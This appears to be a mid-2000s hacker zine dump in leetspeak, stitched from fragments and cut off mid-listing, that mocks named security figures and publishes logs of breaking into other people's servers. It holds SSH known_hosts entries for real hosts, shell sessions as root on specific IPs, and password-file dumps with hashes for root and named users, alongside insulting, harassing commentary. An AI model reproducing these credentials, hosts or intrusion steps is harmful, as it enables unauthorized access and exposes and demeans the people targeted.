AAAAB3NzaC1yc2EAAAABIwAAAIEAtxZfk9D5AYL0ANMVkvp8O38p3EPxUBNZEIhyi9yesQFn0Ad83fInDDgLu+ZaOcAZi8kxROAcxyDuye/nNx0jAs24C6cHyBE5YWbe4341NT/8u1BTq87XVXmD965W1oMJ1dr7k9UvdAUJSvSs5rwIANsQU9SJMbJ/AxjjLsWEvQs= 192.168.1.133 ssh-rsa AAAAB3NzaC1yc2EAAAABIwAAAIEA2N2kJndwU/m2yh5OtDibxelAcB7MdVitzGoFUr1AJOlC/bw6oQ+jcwZvEEk6E+ZhlB333E/qr/jzJUKjVePZkd8ZHvVxaCHwWlqg9VsDzd16FwcNdld9NKPCYyxsfaC454F8r1qJ0Tmr5tAunCgx2tGNWM97xfOtDcxH21ylWec= 62.4.74.155 ssh-rsa AAAAB3NzaC1yc2EAAAABIwAAAIEAtqZ4cJ1xwKSdvojslsht7sflxg/jbazCtpykVLlGQmnStIEitMyqpPfeVqtnBpAIMYxWrSI2Znkps4Eolr1JziYt4stT1LHci3xQwZh7GStbMrCf00nT/JSMwNwEo3xPCLxYEJb3p7yl77nFi9dG0e7Llc9Cy1WSemsBR3nH63s= 62.4.74.136 ssh-rsa AAAAB3NzaC1yc2EAAAABIwAAAIEA2N2kJndwU/m2yh5OtDibxelAcB7MdVitzGoFUr1AJOlC/bw6oQ+jcwZvEEk6E+ZhlB333E/qr/jzJUKjVePZkd8ZHvVxaCHwWlqg9VsDzd16FwcNdld9NKPCYyxsfaC454F8r1qJ0Tmr5tAunCgx2tGNWM97xfOtDcxH21ylWec= ffm-game17.stormix.de,62.4.81.232 ssh-rsa AAAAB3NzaC1yc2EAAAABIwAAAIEAr7Ny/+Shp6aa/X1JBykQ3Zk0m1g4+xqj0z7H5KHYLYg6rWsN1Yk1njePJfNcR1tPArfF2lAoUAHQd+SAcszp/QJTtmwhNyqJjrwz9x7D7KcA/jhY/fbosXIzDpo7oFs4oyenwqXHw3c1714mVI4gPzvNgFZHHaqLAV9/e9M83f8= ffm-game11.stormix.de ssh-rsa AAAAB3NzaC1yc2EAAAABIwAAAIEAr7Ny/+Shp6aa/X1JBykQ3Zk0m1g4+xqj0z7H5KHYLYg6rWsN1Yk1njePJfNcR1tPArfF2lAoUAHQd+SAcszp/QJTtmwhNyqJjrwz9x7D7KcA/jhY/fbosXIzDpo7oFs4oyenwqXHw3c1714mVI4gPzvNgFZHHaqLAV9/e9M83f8= 62.93.205.30 ssh-rsa AAAAB3NzaC1yc2EAAAABIwAAAIEA2BlN8q+aID3mM6dxi6+aKnOwtVabnZS7FIioAH/UyVU7L/IufKrqnD/Gnpog8JoZJL/TVcbZ2y0/nAKb5Sgtatb7hpFxx3Fn69vUROPtr1h8KYN4yzA7BiUx62ss4s1qg5kuGbHit7rklzgDgWmz2ws4t5beP5btvzBLW8aYU8k= 62.4.74.224 ssh-rsa AAAAB3NzaC1yc2EAAAABIwAAAIEAtnAl3sTQqLE2TX4OMga1fL243tvF3vujgyI+P2EzKcKdjYNGbLnI7Yb6UU1AGwSI/UYfngj34L9iXhJtOmDTFPYT4zN9jPsJdr5tK9BQkE96Ub9j+eAM5YAO80mOveIxbn1mR/DyIiV3eEIo4rO7ptlrxqNWZioxnO8iPPszWvs= mail.de-punkt.de ssh-rsa AAAAB3NzaC1yc2EAAAABIwAAAIEAmGMUnbdKqgeplS/3CTURHknAJ1AEoBE5OJqecBdUrjmCShytmag6hfwJvez7jjBU4Ov7yZksFxMlCrjrlpVSm1BlLhI7b81vtPHHqo1md1WlgOjP6OhHCeVo3KlcHXtWUlT4Sh7I6pKO3IZ239MSAOUoIKcZd0mMAdjdOwnX8Bk= 62.4.81.208 ssh-rsa AAAAB3NzaC1yc2EAAAABIwAAAIEAv+jNJxnsPOIxXW5c7FYS2rs4fNtqXrJ+b1qKxinbGMaoRw/ZyW4iOYb+grpXp3pQrKNe155+dUEm+4ylObvW4NBF+JJkoTWshIodcJy4KK2un2mRwKGAuGV+GGHniU3R8xsVIslUfKllA4qP5b9EHd5A1sQrF2t/mkKHLT3WUpk= mx-10.loretis.com,62.93.205.83 ssh-rsa AAAAB3NzaC1yc2EAAAABIwAAAIEAr3FBwUshy8ny9Tlqd5/NWa6OMolmKhDcpAmtfzCMR21piN4IufDy6cms85YVdKhuyAmkmu+aUZ836HwEpmXcoQR0DxOXORm2MX9t/GU2j3fS9QsDF1KwOWy3NYNmHpAMt7bk0EklWwB96RSjjGNhJ3md/SoPY/I2lhMzOKK1u9k= ^ --- w3 0wn3d 4ll th3s3. v3nd0r n0t1f1c4t10n: no fix on 0day. th4nkz t0 kunz (aka absynth) 0f th3 h4rd3n3d-php s3cur1ty t34m f0r 4ll0w1ng h1z s1t3 t0 run l1k3 3v3ry vuln3r4bl3 w3b4pp 1n th3 l4zt 6 y34rz & f0r b31ng t0 stup1d t0 fuck1ng n0t1c3 th3 br34k 1n. 26.txt -~-~-~ 4ud1t1ng th3 h4q3rz m1nd 4ud1t1ng th3 h4q3r m1nd. by MRH- (H 1z 4 h4q3r!) h3y h3y h3y!!! w3lc0m3 t0 my t3xt 1n th3 h0no z1n3. 3y3 y4m t00 stup1d t0 wr1t3 a full b00k, s0 h0no l3t m3 wr1t3 th1z sh0rt t3xt s0 th4t th3 s3cur1ty w0rld w1ll kn0w h0w t0 sp0t a tru3 h4q3r. f1rzt th1ng t0 kn0w.. h4q3rz r 0n uz3n3t. s3c0nd.. h4q3rz uz3 c0d3z. th1rd.. 3y3 y4m a h4q3r!!! h4 h4 h4. -~-~-~ n0w l3tz b3g1n. h4q3r subj3ct numb3r 0n3: HDM (H4lf D3v3l0p3d M1dg3t) th1z h4q3r st4ndz t4ll @ 5 ft 1 1nch3z. d0nt l3t h1z g3ll3d h41r f00l y0u, h3 tru3ly 1z tr41l3r p4rk tr4sh. tr33t0p tr41l3r p4rk 1z wh3r3 h3 1zt l34rn3d t0 c0d3. 1t w4z th3r3 th4t th3 m1dg3t m3t h1z l1f3 t1m3 c0mp4n10n & c0d1ng buddy, sp00nm. t0g3th3r th3y s4t 4r0und 4 d4yz try1ng t0 h4q 1mmun1tys3c, but s33mz l1k3 th3y c0uldnt must3r th3 4b1l1t13z. th3r3 c4z3 1z tru3ly un1qu3 1n th4t 1nzt34d 0f g1v1ng up t0 b3c0m3 a du0 0f m4l3 str1pp3rz th3 t34m w3nt 0n t0 b3c0m3 w0rld f4m0uz 4uth0rz 0f th3 m3t4spl01t pr0j3ct!! 3y3 p3rs0n4lly h4v3 uz3d th1z t00l t0 d0 4ll 0f my h4q1ng. 3y3 c4ught up w1th th3 gr34t HDM & sp00nm @ d3fc0n l4zt y34r. h3r3 1z 4 gl1ms3 1nt0 th31r w0rld. HDM: "I beat up little kids and then spike my hair." spoonm: "my mother beat me." 4z y0u c4n s33, th3r3 1z a r34s0n th3z3 2 h4lf br41n3d h4q3rz s33k m0r3 4tt3nt10n th4n r3dp4ntz 0n a sug4r buzz! 1f y0u h4v3 s33n 0r h34rd fr0m sp00nm'z m0th3r, plz c0nt4ct MRX@whatever-company-kf-is-currently-failing-at.com -~-~-~ n3xt subj3ct 1z a w3ll kn0wn s0uth 4fr1c4n h4q3r by th3 n4m3 0f awk. awk 1z kn0wn t0 ch3w 0n pur3 st33l t0 h3lp "t0ugh3n up" h1z gumz. h3 41nt t0 puzzy! 3y3 0nc3 w4tch3d h1m k1ckb4n kokanin fr0m #darknet!! 1t 1z rum0r3d th4t awk'z d1q c4n w1thst4nd t0rtur3z 0nly pr3v10uzly kn0wn t0 b0b fl4n4g4n. h0w much 0f th1z m4n 1z myth th0ugh? I c4ught awk 0n th3 3r1z fr33 ch4t n3tw0rk t0 4sk h1m a qu3st10n.. h0w b1g r y0ur b4llz do0d? GFRRRRAWWWLL!!@#!@# ME BALLS !@#!@# HURT!!!!@#!@#! GRRRRRRWAAWWWWLL!L@# FEED AWK!@#!@# PROTIEN!!!!## GRRRAAWWRRRLLL!!!#$#$%%% th3 0nly l0g1c4l 4ssumpt10n 0n3 c4n m4k3 1z th4t awk w4z l4t3 1n d3c3nd1ng fr0m th3 4p3 f4m1ly, 4ls0 h1z l0w 1q t3llz uz th4t h3 pr0b4bly h4z a m1zz1ng chr0m0z0m3. -~-~-~ 0ur f1rzt tru3ly m4rv4louz subj3ct g03z by th3 h4ndl3 agntorng. unl1k3 th3 def0l14nt, th1z agntorng 1z h4rml3zz. g1v3n th3 ch01c3 b3tw33n h4q1ng & m4k1ng upst0r13z th1z 1nt3rn3t h3r0 w1ll p1q st0ryz 3v3ryt1m3! wh4t a h4q3r! 1z 1t th4t h3 c4nt h4q? 1z 1t th4t h3 1z a "p0z3r" 4z h3 w0uld s4y? 3y3 th1nk s0! 1t 1z my c0nclus10n th4t s0m3 hum4nz, g1v3n 3n0ugh l4m3n3zz 4dd3d t0 th31r 3nv1r0nm3nt phys1c4lly c4nn0t h4q!! b31ng th4t agntorng h4z b33n 3xp0z3d t0 th3 d4rp4 1rcd f0r 4n 3xt3nd3d 4m0unt 0f t1m3.. 3y3 b3li3v3 h3 1z h4q1ng imp0t3nt! 3y3 4sk3d agntorng th1z wh3n h3 w4z 0n mushr00mz 1rc1ng fr0m an 0wn3d sh3ll b0x. I cant feel my legs. I think h0no hacked them! oh well.. I'll sit around an irc tomorrow. h0no d1d n0t h4q th3m. 1t turnz 0ut th4t agntorng 1z suff3r1ng fr0m wh4t w3 1n th3 buz1n3zz c4ll "p4r4n01d 3y3 y4m h4q3d syndr0m". h3 b3l13v3z th1z t0 such 4n 3xt3nt th4t h3 0ft3n t1m3z sw1tch3z sh3llz 3 t0 4 t1m3z 4n h0ur juzt 1nc4z3 h0no 0wnz a b0x. h0no h4z 1nf0rm3d m3 th4t f0ll0w1ng agntorng'z gu1d3 t0 4dv01d1ng g3tt1ng 0wn3d w1ll 0nly result 1n m0r3 st34lthy m3th0dz f0r b4qd00r1ng. 4nd th3y w1sh t0 4sk h1m th1z "how long were you fuqn owned for?" th3y b3li3v3 th3 4nsw3r 1z "to this day." s1nc3 3y3 y4m 4n 3xp3rt @ 4n4lys1s, 3y3 w1ll d3t3rm1n3 th4t th3y m34n t0 s4y: AGNTORNG. YOU ARE OWNED!!! HAR HAR HAR!!!@# 27.txt -~-~-~ DVDM4N 1Z A FUQN FR34K!!@# b3 f0r3w4rn3d. th1z 1z th3 gr34t3zt h4q 3v3r t0 t4k3 pl4c3 0n th3 1nt3rn3t. w3 4lm0zt f33l b4d f0r d01ng th1z t0 4n0th3r hum4n b31ng... -~-~-~ h0no pr3s3ntz... DVDMAN 1Z A FUQN FR34K!!@# -~-~-~ w3 w1ll st4rt y0u 0ff w1th dvdman's light.volthost.net 4cc0unt: $ ls -al total 105458 drwx--x--- 9 dvdman free 1024 Jul 10 02:40 . drwxr-xr-x 97 root wheel 2048 Jul 20 22:55 .. drwx------ 3 dvdman free 512 Jun 21 00:10 .BitchX -rw------- 1 dvdman free 17075 Jul 10 12:30 .bash_history -rw-r--r-- 1 dvdman free 771 Apr 21 2005 .cshrc drwx------ 2 dvdman free 512 Jul 4 13:28 .irssi -rw-r--r-- 1 dvdman free 255 Apr 21 2005 .login -rw-r--r-- 1 dvdman free 165 Apr 21 2005 .login_conf -rw------- 1 dvdman free 371 Apr 21 2005 .mail_aliases -rw-r--r-- 1 dvdman free 331 Apr 21 2005 .mailrc -rw------- 1 dvdman free 606 May 11 2005 .mysql_history -rw-r--r-- 1 dvdman free 45 May 12 2005 .passwd -rw-r--r-- 1 dvdman free 801 Apr 21 2005 .profile -rw------- 1 dvdman free 276 Apr 21 2005 .rhosts -rw-r--r-- 1 dvdman free 852 Apr 21 2005 .shrc drwx------ 2 dvdman free 512 May 6 2005 .ssh -rw-r--r-- 1 dvdman free 786432 Jul 10 01:37 X-05BL_060609_352eubx_api_au_1.bin drwxr-xr-x 2 dvdman free 512 Jun 22 2005 gals.fraek.com -rw-r--r-- 1 dvdman free 7188480 Jun 22 2005 galsfraek.tar -rw-r--r-- 1 dvdman free 73474 Jul 10 01:07 n2edit_beta9.zip drwxrwxrwx 2 dvdman free 512 May 5 2005 output drwxr-xr-x 9 dvdman free 512 Jun 21 01:29 public_html -rwxr-xr-x 1 dvdman free 184 May 5 2005 run.sh -rw-r--r-- 1 dvdman free 99788800 Jun 22 2005 sexyfreak.tar drwxr-xr-x 4 dvdman free 512 Sep 12 2005 vidaguerra $ cat .passwd dvdman:$apr1$7dGho/..$kvC5BJc11zxk3qEnokOYg/ -bash-3.00# ssh johnh@light.volthost.net - All failed password attempts are logged. We will report multiple failed attempts. - johnh@light.volthost.net's password: $ id uid=2111(johnh) gid=2000(free) groups=2000(free) $ ps aux USER PID %CPU %MEM VSZ RSS TT STAT STARTED TIME COMMAND root 85874 0.0 0.1 1852 1448 ?? Ss Wed03PM 0:05.43 screen johnh 95791 0.0 0.3 8356 5536 q2 S+ Thu02PM 0:34.52 irssi -h rate.limi johnh 65902 0.0 0.1 1868 1500 pq Is+ Thu08AM 0:00.06 /usr/local/bin/bas johnh 85875 0.0 0.1 1820 1424 q2 Is Wed03PM 0:00.01 /usr/local/bin/bas johnh 35056 0.0 0.0 400 236 ?? R 5:05PM 0:00.00 ps aux $ ls -al total 118 drwx--x--- 9 johnh free 512 Jun 27 12:31 . drwxr-xr-x 97 root wheel 2048 Jul 20 22:55 .. drwx------ 3 johnh free 512 Jun 21 02:19 .BitchX -rw------- 1 johnh free 10301 Jul 21 15:48 .bash_history -rw-r--r-- 1 johnh free 771 Jun 21 00:29 .cshrc drwx------ 2 johnh free 512 Jul 4 22:25 .irssi -rw-r--r-- 1 johnh free 255 Jun 21 00:29 .login -rw-r--r-- 1 johnh free 165 Jun 21 00:29 .login_conf -rw------- 1 johnh free 371 Jun 21 00:29 .mail_aliases -rw-r--r-- 1 johnh free 331 Jun 21 00:29 .mailrc -rw------- 1 johnh free 32 Jun 21 17:46 .mysql_history -rw-r--r-- 1 johnh free 68 Jun 27 12:32 .passwd -rw-r--r-- 1 johnh free 801 Jun 21 00:29 .profile -rw------- 1 johnh free 276 Jun 21 00:29 .rhosts -rw-r--r-- 1 johnh free 852 Jun 21 00:29 .shrc drwx------ 2 johnh free 512 Jun 23 15:11 .ssh drwx------ 5 johnh free 512 Jul 10 08:16 irclogs lrwxr-xr-x 1 root free 26 Jun 21 00:37 jbhale.com -> /home/www/sites/jbhale.com -rw-r--r-- 1 johnh free 53626 Mar 27 2004 mb2md-3.20.pl drwxr-xr-x 4 johnh free 512 Jun 21 09:13 nc drwxr-xr-x 4 johnh free 512 Jun 21 08:40 others drwxr-xr-x 2 johnh free 512 Jul 10 01:00 public_html -rw-r--r-- 1 johnh free 13808 Jun 24 16:57 rom102-v28-rev109-0001-blocker.zip $ cd irclogs $ ls -alR total 10 drwx------ 5 johnh free 512 Jul 10 08:16 . drwx--x--- 9 johnh free 512 Jun 27 12:31 .. drwx------ 2 johnh free 512 Jul 4 14:40 scnet drwx------ 2 johnh free 512 Jul 12 11:10 servercentral drwx------ 2 johnh free 1024 Jul 20 15:32 uicn ./scnet: total 3762 -rw------- 1 johnh free 20445 Jul 10 03:00 #!l33tsecurity.log -rw------- 1 johnh free 954489 Jul 10 03:00 #efnet.log -rw------- 1 johnh free 2491175 Jul 10 03:00 #nanog.log -rw------- 1 johnh free 262940 Jul 10 03:00 #voltshells.log drwx------ 2 johnh free 512 Jul 4 14:40 . drwx------ 5 johnh free 512 Jul 10 08:16 .. -rw------- 1 johnh free 381 Jul 4 22:23 alums-.log -rw------- 1 johnh free 3562 Jul 10 03:30 auth.log -rw------- 1 johnh free 2153 Jun 27 02:58 dvdman.log -rw------- 1 johnh free 4217 Jun 24 23:33 joel.log -rw------- 1 johnh free 163 Jun 29 09:24 kiles-.log -rw------- 1 johnh free 5678 Jul 8 19:03 momo.log -rw------- 1 johnh free 262 Jul 2 03:53 sweet}{li.log ./servercentral: total 288 -rw------- 1 johnh free 2576 Jul 12 09:45 #!l33tsecurity.log -rw------- 1 johnh free 254953 Jul 12 09:45 #nanog.log drwx------ 2 johnh free 512 Jul 12 11:10 . drwx------ 5 johnh free 512 Jul 10 08:16 .. -rw------- 1 johnh free 2244 Jul 16 23:04 auth.log -rw------- 1 johnh free 146 Jul 12 11:15 johnh.log -rw------- 1 johnh free 1375 Jul 12 11:15 sc-notice.log ./uicn: total 7014 -rw------- 1 johnh free 383 Jul 20 08:42 ##al7bar-help.log -rw------- 1 johnh free 527 Jun 28 15:22 ##al7bar.tk.log -rw------- 1 johnh free 720 Jul 20 08:42 #al7bar-help.log -rw------- 1 johnh free 4795533 Jul 21 17:11 #al7bar.tk.log -rw------- 1 johnh free 373 Jul 20 08:44 #alt7bar.tk.log -rw------- 1 johnh free 657717 Jun 29 19:15 #dishnetwork.log -rw------- 1 johnh free 1307717 Jul 2 00:59 #dss-newbies.log -rw------- 1 johnh free 369 Jul 2 00:58 #pansat.log drwx------ 2 johnh free 1024 Jul 20 15:32 . drwx------ 5 johnh free 512 Jul 10 08:16 .. -rw-r--r-- 1 johnh free 143669 Jul 20 08:48 A -rw------- 1 johnh free 3390 Jul 20 08:43 [c3p0].log -rw------- 1 johnh free 10919 Jul 20 14:50 auth.log -rw------- 1 johnh free 585 Jul 20 21:40 bar-bee-q.log -rw------- 1 johnh free 176 Jun 29 01:26 candoo.log -rw------- 1 johnh free 129 Jun 28 23:46 cra.log -rw------- 1 johnh free 2276 Jun 29 02:27 crazyhorse.log -rw------- 1 johnh free 1660 Jul 20 14:44 demigawd.log -rw------- 1 johnh free 326 Jun 28 22:07 expatriat.log -rw------- 1 johnh free 181 Jul 20 08:43 ftamoyahua.log -rw------- 1 johnh free 41700 Jul 20 20:02 global.log -rw------- 1 johnh free 2765 Jun 29 00:07 hackdss.log -rw------- 1 johnh free 243 Jun 28 17:32 hackinsat.log -rw------- 1 johnh free 2701 Jul 20 08:51 huckleberry.log -rw------- 1 johnh free 974 Jun 26 17:45 huggybear.log -rw------- 1 johnh free 737 Jun 25 17:50 j.log -rw------- 1 johnh free 1211 Jul 20 13:51 john.log -rw------- 1 johnh free 13495 Jul 20 14:50 johnh.log -rw------- 1 johnh free 4392 Jul 19 20:17 link.log -rw------- 1 johnh free 160 Jun 25 01:19 moneey.log -rw------- 1 johnh free 440 Jun 26 15:27 mud.log -rw------- 1 johnh free 212 Jul 20 14:51 nailer.log -rw------- 1 johnh free 640 Jun 26 21:37 nexus.log -rw------- 1 johnh free 16285 Jul 20 14:44 nickserv.log -rw------- 1 johnh free 4195 Jul 21 01:19 night^owl.log -rw------- 1 johnh free 10440 Jul 20 13:50 operserv.log -rw------- 1 johnh free 6240 Jul 20 14:50 opsb.log -rw------- 1 johnh free 314 Jul 20 15:32 perception.log -rw------- 1 johnh free 409 Jun 29 01:29 red^neck.log -rw------- 1 johnh free 325 Jun 28 17:54 rusty.log -rw------- 1 johnh free 8463 Jul 20 14:50 secureserv.log -rw------- 1 johnh free 307 Jul 20 14:51 shaggy.log -rw------- 1 johnh free 176 Jun 28 21:53 showtime.log -rw------- 1 johnh free 201 Jun 26 15:27 superjesus.log -rw------- 1 johnh free 3974 Jun 27 03:01 topcon.log n0t1c3 h0w dvdman l0gz h1z ch4tz.. s0undz l1k3 s0m3th1ng 4 n4rc w0uld d0! -~-~-~ n0w 1t'z 4 w3ll kn0wn f4ct th4t dvdman 1z d33p 1n th3 sc3n3. h3 3v3n h4z a sh3ll 0n th3 w0rld r3n0wn undef.net! -~-~-~ -bash-3.00# ssh john@undef.net -------------------------------------------------------------- WARNING: PLEASE READ -------------------------------------------------------------- UNAUTHORIZED ACCESS IS PROHIBITED. (a) All access to, and activities on this system that are not explicitly authorized by Greg Albrecht are considered unauthorized. (b) All access to, and activities on this system are logged. (c) Unauthorized access to, and activities on this system will be reported to the appropriate authorities. -------------------------------------------------------------- Welcome to juanita.undef.net Password: $ w 9:25AM up 6:41, 2 users, load averages: 0.35, 0.35, 0.35 USER TTY FROM LOGIN@ IDLE WHAT xty p3 63.130.185.162 6:34AM 2:51 - xty p4 63.130.185.162 6:35AM 2:33 - $ ls -al total 3218 drwxr-xr-x 14 john john 1024 Jul 19 13:29 . drwxr-xr-x 35 root wheel 2048 May 16 15:58 .. drwx------ 5 john john 512 Jan 17 2005 .BitchX lrwxrwxrwx 1 john john 9 Jul 14 2005 .bash_history -> /dev/null -rw-r----- 1 john john 63 Dec 31 2004 .bash_logout -rw-r----- 1 john john 216 Dec 31 2004 .bash_profile -rw-r----- 1 john john 131 Dec 31 2004 .bashrc -rw-r--r-- 1 john john 771 Dec 31 2004 .cshrc lrwxrwxrwx 1 john john 9 Jul 14 2005 .forward -> /dev/null drwx------ 2 john john 512 Jan 10 2005 .irssi -rw-r--r-- 1 john john 7 Jun 12 01:35 .ispoof -rw-r--r-- 1 john john 255 Dec 31 2004 .login -rw-r--r-- 1 john john 165 Dec 31 2004 .login_conf -rw------- 1 john john 371 Dec 31 2004 .mail_aliases -rw-r--r-- 1 john john 331 Dec 31 2004 .mailrc -rw-r--r-- 1 john john 26 Jun 12 01:35 .oidentd.conf -rw-r--r-- 1 john john 801 Dec 31 2004 .profile -rw------- 1 john john 276 Dec 31 2004 .rhosts -rw-r----- 1 john john 3394 Dec 31 2004 .screenrc lrwxrwxrwx 1 john john 9 Jul 14 2005 .sh_history -> /dev/null lrwxrwxrwx 1 john john 9 Jul 14 2005 .shosts -> /dev/null -rw-r--r-- 1 john john 852 Dec 31 2004 .shrc drwx------ 4 john john 512 Jan 6 2005 .silc drwx------ 2 john john 512 Feb 7 2005 .ssh drwxr-xr-x 12 john john 1024 Jan 17 2005 BitchX drwx------ 6 john john 512 Jun 9 08:04 Maildir drwxr-xr-x 2 john john 512 Jan 17 2005 bin drwxr-xr-x 2 john john 1024 Jun 2 06:51 bnc2.9.4 -rw-r--r-- 1 john john 76896 Feb 6 2005 bnc2.9.4.tar.gz drwx------ 10 john john 512 Jan 2 2005 cyp -rw-r--r-- 1 john john 68742 Jun 30 2003 cyp1.0k.tar.gz -rw-r--r-- 1 john john 2532476 Mar 26 2004 ircii-pana-1.1-final.tar.gz drwx-----x 3 john john 512 Jul 20 12:41 my_webpage -rw-r--r-- 1 john john 179227 Jul 19 13:29 p -rw-r--r-- 1 john john 312224 Jun 24 2004 psyBNC2.3.1.tar.gz drwxr-xr-x 11 john john 512 Jun 13 08:09 psybnc lrwxrwxrwx 1 john john 10 Jul 14 2005 public_html -> my_webpage -rwxr-xr-x 1 john john 5178 Feb 3 2005 test -rw-r--r-- 1 john john 115 Feb 3 2005 test.c drwxr-xr-x 4 john john 512 Jul 20 12:41 ul $ id uid=1056(john) gid=1056(john) groups=1056(john) y3z dvdman.. w3 g0t y0ur stup1d fuqn ip f1nd3r w4r3z. (xt w0rkz w1th dvdman!!! th31r r3l4t10nsh1p m4y bl0ss0m 1nt0 s0m3th1ng m0r3.. k33p y0ur 3y3z p33l3d!@#) -~-~-~ s0m3h0w dvdman g0t h1r3d by bangbros. 1f th3y 3v3n th1nk 4b0ut g1v1ng h1m a g00d r3f3r3nc3 th3y w1ll b3 rm'd. [root@hackerz.org]# ssh -l root 64.111.193.9 The authenticity of host '64.111.193.9 (64.111.193.9)' can't be established. RSA key fingerprint is d7:d8:44:e6:70:39:40:c4:49:15:c3:6e:25:2c:af:6b. Are you sure you want to continue connecting (yes/no)? yes Warning: Permanently added '64.111.193.9' (RSA) to the list of known hosts. root@64.111.193.9's password: Last login: Tue Jul 19 10:07:48 2005 FreeBSD 5.3-RELEASE (GENERIC) #0: Fri Nov 5 04:19:18 UTC 2004 Welcome to FreeBSD! Before seeking technical support, please use the following resources: o Security advisories and updated errata information for all releases are at http://www.FreeBSD.org/releases/ - always consult the ERRATA section for your release first as it's updated frequently. o The Handbook and FAQ documents are at http://www.FreeBSD.org/ and, along with the mailing lists, can be searched by going to http://www.FreeBSD.org/search/. If the doc distribution has been installed, they're also available formatted in /usr/share/doc. If you still have a question or problem, please take the output of `uname -a', along with any relevant error messages, and email it as a question to the questions@FreeBSD.org mailing list. If you are unfamiliar with FreeBSD's directory layout, please refer to the hier(7) manual page. If you are not familiar with manual pages, type `man man'. You may also use sysinstall(8) to re-enter the installation and configuration utility. Edit /etc/motd to change this login announcement. %w 3:26AM up 67 days, 13:16, 1 user, load averages: 0.00, 0.00, 0.00 USER TTY FROM LOGIN@ IDLE WHAT johnh p0 paysite 04Nov05 4days bash %cat /etc/master.passwd # $FreeBSD: src/etc/master.passwd,v 1.39 2004/08/01 21:33:47 markm Exp $ # root:$1$t/M3s1qW$qN9jZIr8RNqXqdCw/WrK9.:0:0::0:0:Charlie &:/root:/bin/csh toor:*:0:0::0:0:Bourne-again Superuser:/root: daemon:*:1:1::0:0:Owner of many system processes:/root:/usr/sbin/nologin operator:*:2:5::0:0:System &:/:/usr/sbin/nologin bin:*:3:7::0:0:Binaries Commands and Source:/:/usr/sbin/nologin tty:*:4:65533::0:0:Tty Sandbox:/:/usr/sbin/nologin kmem:*:5:65533::0:0:KMem Sandbox:/:/usr/sbin/nologin games:*:7:13::0:0:Games pseudo-user:/usr/games:/usr/sbin/nologin news:*:8:8::0:0:News Subsystem:/:/usr/sbin/nologin man:*:9:9::0:0:Mister Man Pages:/usr/share/man:/usr/sbin/nologin sshd:*:22:22::0:0:Secure Shell Daemon:/var/empty:/usr/sbin/nologin smmsp:*:25:25::0:0:Sendmail Submission User:/var/spool/clientmqueue:/usr/sbin/nologin mailnull:*:26:26::0:0:Sendmail Default User:/var/spool/mqueue:/usr/sbin/nologin bind:*:53:53::0:0:Bind Sandbox:/:/usr/sbin/nologin proxy:*:62:62::0:0:Packet Filter pseudo-user:/nonexistent:/usr/sbin/nologin _pflogd:*:64:64::0:0:pflogd privsep user:/var/empty:/usr/sbin/nologin uucp:*:66:66::0:0:UUCP pseudo-user:/var/spool/uucppublic:/usr/local/libexec/uucp/uucico pop:*:68:6::0:0:Post Office Owner:/nonexistent:/usr/sbin/nologin www:*:80:80::0:0:World Wide Web Owner:/nonexistent:/usr/sbin/nologin nobody:*:65534:65534::0:0:Unprivileged user:/nonexistent:/usr/sbin/nologin johnh:$1$P6.VYjXW$C1a25LaiPL6RwMRAJygaM0:1001:1001::0:0:John H:/home/johnh:/usr/local/bin/bash gus:$1$84nQ7mp0$vCet0Ft4spM2m375KWIWD/:1002:1002::0:0:Gustavo:/home/gus:/usr/local/bin/bash faccundo:$1$496JBQc0$ueeV1pV4T3o29eAL1C48p0:1003:1003::0:0:faccundo:/home/faccundo:/usr/local/bin/bash %cd /home/johnh %ls -al total 716 drwxr-xr-x 4 johnh johnh 512 Oct 31 12:07 . drwxr-xr-x 5 root wheel 512 Aug 8 11:52 .. -rw------- 1 johnh johnh 3832 Nov 19 14:12 .bash_history -rw-r--r-- 1 johnh johnh 767 Mar 25 2005 .cshrc -rw-r--r-- 1 johnh johnh 248 Mar 25 2005 .login -rw-r--r-- 1 johnh johnh 158 Mar 25 2005 .login_conf -rw------- 1 johnh johnh 373 Mar 25 2005 .mail_aliases -rw-r--r-- 1 johnh johnh 331 Mar 25 2005 .mailrc -rw-r--r-- 1 johnh johnh 797 Mar 25 2005 .profile -rw------- 1 johnh johnh 276 Mar 25 2005 .rhosts -rw-r--r-- 1 johnh johnh 975 Mar 25 2005 .shrc drwxr-xr-x 2 johnh johnh 512 Oct 26 16:18 .ssh -rwxr-xr-x 1 johnh johnh 4955 Oct 27 21:47 a -rw-r--r-- 1 johnh johnh 173 Oct 27 21:47 a.c -rw------- 1 johnh johnh 299008 Oct 27 21:47 a.core -rw-r--r-- 1 root johnh 117 Jun 3 2005 blah.sh drwxr-xr-x 2 root johnh 512 Oct 31 12:07 debug %uname -a FreeBSD backup.bangbros.com 5.3-RELEASE FreeBSD 5.3-RELEASE #0: Fri Nov 5 04:19:18 UTC 2004 root@harlow.cse.buffalo.edu:/usr/obj/usr/src/sys/GENERIC i386 %ssh -l root 64.111.193.12 root@64.111.193.12's password: Last login: Tue Jun 21 20:42:23 2005 FreeBSD 5.3-RELEASE (GENERIC) #0: Fri Nov 5 04:19:18 UTC 2004 Welcome to FreeBSD! Before seeking technical support, please use the following resources: o Security advisories and updated errata information for all releases are at http://www.FreeBSD.org/releases/ - always consult the ERRATA section for your release first as it's updated frequently. o The Handbook and FAQ documents are at http://www.FreeBSD.org/ and, along with the mailing lists, can be searched by going to http://www.FreeBSD.org/search/. If the doc distribution has been installed, they're also available formatted in /usr/share/doc. If you still have a question or problem, please take the output of `uname -a', along with any relevant error messages, and email it as a question to the questions@FreeBSD.org mailing list. If you are unfamiliar with FreeBSD's directory layout, please refer to the hier(7) manual page. If you are not familiar with manual pages, type `man man'. You may also use sysinstall(8) to re-enter the installation and configuration utility. Edit /etc/motd to change this login announcement. %uname -a FreeBSD 2257i.bangbros.com 5.3-RELEASE FreeBSD 5.3-RELEASE #0: Fri Nov 5 04:19:18 UTC 2004 root@harlow.cse.buffalo.edu:/usr/obj/usr/src/sys/GENERIC i386 %cat /etc/master.mpasswd # $FreeBSD: src/etc/master.passwd,v 1.39 2004/08/01 21:33:47 markm Exp $ # root:$1$nXG05sKx$oZZfgRYYgs4K5aFLLt/es.:0:0::0:0:Charlie &:/root:/bin/csh toor:*:0:0::0:0:Bourne-again Superuser:/root: daemon:*:1:1::0:0:Owner of many system processes:/root:/usr/sbin/nologin operator:*:2:5::0:0:System &:/:/usr/sbin/nologin bin:*:3:7::0:0:Binaries Commands and Source:/:/usr/sbin/nologin tty:*:4:65533::0:0:Tty Sandbox:/:/usr/sbin/nologin kmem:*:5:65533::0:0:KMem Sandbox:/:/usr/sbin/nologin games:*:7:13::0:0:Games pseudo-user:/usr/games:/usr/sbin/nologin news:*:8:8::0:0:News 